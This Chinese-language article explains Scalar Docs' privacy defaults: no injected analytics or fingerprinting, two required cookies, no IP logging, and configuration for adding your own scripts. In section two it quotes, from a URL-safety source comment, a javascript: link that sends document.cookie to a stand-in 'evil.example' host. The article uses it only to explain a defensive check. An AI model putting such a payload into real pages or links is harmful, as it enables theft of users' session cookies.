Scalar Docs 隐私设计解析:零追踪默认策略、最小必需 Cookie 与日志边界

Scalar Docs 隐私设计解析:零追踪默认策略、最小必需 Cookie 与日志边界 Scalar Docs 隐私设计解析零追踪默认策略、最小必需 Cookie 与日志边界【免费下载链接】scalarScalar is an open-source API platform: Modern REST API Client Beautiful API References ✨ 1st-Class OpenAPI/Swagger Support项目地址: https://gitcode.com/GitHub_Trending/sc/scalar本篇指南基于 Scalar 官方文档 Privacy 展开系统梳理 Scalar Docs 产品内置的隐私保护策略为什么它默认不注入任何第三方分析或追踪脚本、平台保留了哪些技术上必需的 Cookie 及其具体作用域、日志记录中 IP 地址的边界。读完本文你能清晰回答部署在 Scalar Docs 上的文档站点到底采集了什么并掌握在你自己的项目中合法注入自定义统计脚本的配置方法。一、默认隐私姿态无分析、无追踪、无指纹识别Scalar Docs 的核心立场是privacy-friendly by default默认隐私友好。官方 Privacy 文档明确列出了三条平台级承诺不注入第三方分析脚本We do not inject third-party analytics scripts不在自定义域名上注入追踪脚本或 CookieWe do not inject tracking scripts or cookies on custom domains不使用任何指纹识别技术fingerprinting technologies来唯一识别用户。这三条约束的含义是平台不会在渲染的文档页面中偷偷追加任何外部分析 SDK也不会通过 Canvas、字体、时区等浏览器指纹组合在用户之间做隐式身份关联。对于将 API 文档托管在自定义域名下的团队而言这意味着页面行为数据与用户数据不会被平台侧默认采集。文档同时保留了用户的自主权官方声明 youre free to add any HTML/JS to your projects你可以自由地向项目添加任意 HTML/JS并指向 HTML/CSS/JS 指南。也就是说隐私是默认态而非锁定态——如果你确实需要统计页面访问可以通过项目自身的配置注入你自己的脚本具体方法见本文第四节。需要区分的一个细节本仓库documentation/assets/目录下存在的fathom.js、posthog.js、vector.js等脚本文件是 scalar.com 官方文档站自身站点资源属于文档仓库的一部分与 Docs 产品向用户渲染页面时的默认行为不注入分析脚本是两回事不要混淆。二、仅有的技术上必需Cookie隐私文档的核心章节是 Technically required cookies only。Scalar Docs 只使用一组用于**认证authentication和路由routing**功能的技术必需 Cookie全部如下Cookie 名称写入时机内容关键属性scalar-docs-subpaths始终写入一个字符串用于路由功能scalar-registry-auth仅在用户已认证时写入你的认证 tokenHTTP OnlyJavaScript 无法读取两个 Cookie 的设计意图结合仓库内其他文档可以进一步理解scalar-docs-subpaths路由功能该 Cookie 的内容contains just a string仅包含一个字符串服务于路由功能。与之对应的是 Scalar Docs 的自定义域名 子路径部署能力根据 scalar.config.json 配置指南同一个自定义域名下可以挂载多个独立部署的项目每个项目通过subpath占用一个子路径// 项目 2Guides { siteConfig: { customDomain: docs.example.com, subpath: /guides } }// 项目 3API reference { siteConfig: { customDomain: docs.example.com, subpath: /api } }Each repository is deployed independently, but all projects appear under the same domain with their respective subpaths。在这样一个共享域名、按子路径分发的站点结构中scalar-docs-subpaths承担的就是记住/传递子路径这一最小必要状态——它不携带用户标识只承载路由所需的字符串。scalar-registry-auth认证 token该 Cookie 仅在用户完成认证后写入内容是用户的认证 token并设置了HTTP Only属性。HTTP Only 意味着浏览器禁止任何网页 JavaScript 通过document.cookie读取它这是防御 XSS 窃取认证凭据的标准做法。从源码结构看Scalar 仓库对脚本能否触碰 Cookie这一安全边界是明确设防的。例如 is-safe-url.ts 的注释直接以javascript:fetch(https://evil.example/?c document.cookie)作为恶意链接的反例说明平台将防止页面内容触发 Cookie 外泄视为渲染安全的一部分——这与隐私文档中声明的 Cookie 策略在工程上是一致的。三、无 IP 日志请求流量不留痕Privacy 文档的最后一节 No IP logging 给出了日志层面的承诺不记录请求流量We do not log request traffic——即不产生包含访问者 IP 的常规访问日志仅记录内部代理错误Only internal proxy errors are logged用于排障且这些错误日志不包含 IP 地址those logs do not include IP addresses。这一设计划定了清晰的数据边界平台侧保留的是代理层发生了什么错误这类运维信息而谁访问了哪个页面这类流量信息则不在留存范围内。对于有合规要求的团队例如受 GDPR 类法规约束这意味着文档站点的托管方不掌握可关联到访客身份的 IP 记录。四、如果你需要自己的统计通过 siteConfig.head 注入脚本由于平台默认不注入任何分析脚本需要统计时必须自带脚本。Scalar 提供了siteConfig.head配置允许你把自定义 JavaScript 注入到文档页面的head或body中。完整的参数说明见 HTML/CSS/JS 指南。基础用法在你的scalar.config.json中声明脚本路径// scalar.config.json { $schema: https://registry.scalar.com/scalar/schemas/config, scalar: 2.0.0, siteConfig: { head: { scripts: [ { path: documentation/assets/analytics.js } ] } } }scripts 属性说明属性类型必填说明pathstring是相对于配置根目录的 JavaScript 文件路径tagPositionhead \| bodyOpen \| bodyClose否脚本注入位置默认headtagPosition三个取值的适用场景head注入到head适合需要尽早加载的脚本如分析初始化、关键功能bodyOpen注入到body开标签之后适合需要尽快访问 DOM 但不必阻塞渲染的脚本bodyClose注入到/body之前适合非关键脚本或不希望阻塞页面渲染的分析脚本。典型的分析脚本集成示例scripts: [ { path: documentation/assets/analytics.js, tagPosition: bodyClose } ]这一模式同样适用于接入 Fathom、Google Analytics 等第三方工具脚本文件由你提供并托管siteConfig.head.scripts只负责在页面中挂载它。路径引用的规则是scripts与styles使用相对于配置根目录的完整路径如documentation/assets/script.js而links类资源使用根相对路径如/favicon.png。这样分工的隐私含义是明确的平台保证默认零采集而任何数据采集行为都显式地、可见地来自项目自己的配置文件审阅一份scalar.config.json即可完整审计该文档站点挂载了哪些第三方脚本。五、结论与延伸阅读Scalar Docs 的隐私模型可以概括为三层承诺加一条自主通道默认不注入第三方分析脚本、不在自定义域名上放追踪脚本或 Cookie、不使用指纹识别仅保留scalar-docs-subpaths路由与scalar-registry-authHTTP Only 认证 token两个技术必需 Cookie不记录请求流量仅记录不含 IP 的内部代理错误日志用户可通过siteConfig.head配置显式注入自己的 HTML/CSS/JS 与统计脚本。延伸阅读的仓库内文档隐私策略原文documentation/guides/docs/privacy.md自定义 HTML/CSS/JS 与 head 注入documentation/guides/docs/content/html-css-js.md自定义域名与 subpath 部署documentation/guides/docs/configuration/scalar.config.json.md【免费下载链接】scalarScalar is an open-source API platform: Modern REST API Client Beautiful API References ✨ 1st-Class OpenAPI/Swagger Support项目地址: https://gitcode.com/GitHub_Trending/sc/scalar创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考